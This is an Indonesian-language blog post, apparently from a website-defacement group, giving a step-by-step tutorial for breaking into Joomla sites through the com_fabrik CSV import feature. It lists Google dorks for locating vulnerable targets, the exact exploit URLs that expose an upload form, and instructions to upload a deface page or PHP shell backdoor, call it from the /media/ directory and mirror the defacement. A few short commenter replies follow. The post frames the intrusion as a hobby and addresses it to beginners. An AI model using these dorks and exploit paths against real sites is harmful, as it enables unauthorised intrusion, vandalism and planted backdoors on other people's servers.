Tutorial Deface Metode Com_Fabrik | GILA CODERS
CrAzY dOg
Hello world :* Oke Mumpung Gw Lagi Kosong Gada Kegiatan Nih dah lama juga kagak update ,tadinya gw bingung mau bagi apaan eh nemu web vuln Com_fabrik Yo wes tak dadike tutor wae , Tanpa Basa Basi siapin sesajen biar nemu vuln wkwkwk jan sampe deh siapin bahan bahan berikut :
1.PC/Android [ JANGAN REMOT TV ]
2.Script Deface [ Wajib ]
3.Shell Backdoor [ Wajib ]
4.Kopi [ Wajib Bagi Yang Suka ]
Oke jika bahan bahan sudah siap semua silahkan duduk manis kopi nya di minum ntar malah dingin ,terus dorking di google dorknya mana mas oke dork nya di bawah ini
Dork :
- inurl:index.php?option=com_fabrik
- inurl:index.php/component/fabrik/ site:
- inurl:index.php?option=com_fabrik&view= site:
- inurl:importcsv.php site:
- inurl:viewTable?cid= site:com
( kembangin lagi ya mas biar nemu yang perawan )
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Mungkin beberapa orang yang baru di dunia deface bingung cara gunain exploit jadi cara gunain exploit gini
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Nah mudahkan tinggal cari jalan jalan di google jika sudah nemu yang kira kira perawan buka web tsb
Nah jika sudah berada di web nya ,Tinggal di jampi jampi ,bukan lah masukin exploit pembunuh nya www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Nah di coba salah satu atau dua duanya gpp ye nanti bakalan muncul tempat upload
Nah jika sudah muncul bayang bayang si target tinggal upload sc santet milik anda atau backdoor ya
Nah Langsung aja tebas coy sikat bang sikat sampai bersih tunggu sampai berhasil setiap web berbeda ya ,kalo di web saya jika sudah terupload muncul seperti ini
Nah ingat ya sekali lagi setiap web berbeda beda jadi jan pernah di samain ntar malah gara gara gak muncul seperti itu dikira gak berhasil makanya di coba dulu,panggil nya gini
www.site.com/media/d0g.html
( d0g.html itu nama sc saya jadi ganti dengan nama sc anda )
Nah tinggal di panggil dah ,
Nah udah terdeface ,tinggal di miror ken bang ,oh iya kalo pas pemanggilan backdoor tinggal ganti aja jadinya gini www.site.com/media/namashell.php Nah udah kan yowes jan lupa ye share turorialnya biar pada tambah ilmu sekian :) .
https://ilustrasisystem.blogspot.co.id/2018/04/deface-fckeditor.html?m=1
ReplyDeleteMisi Admin
Misi mastah
Izinkan Noob berkarya 😂😂😂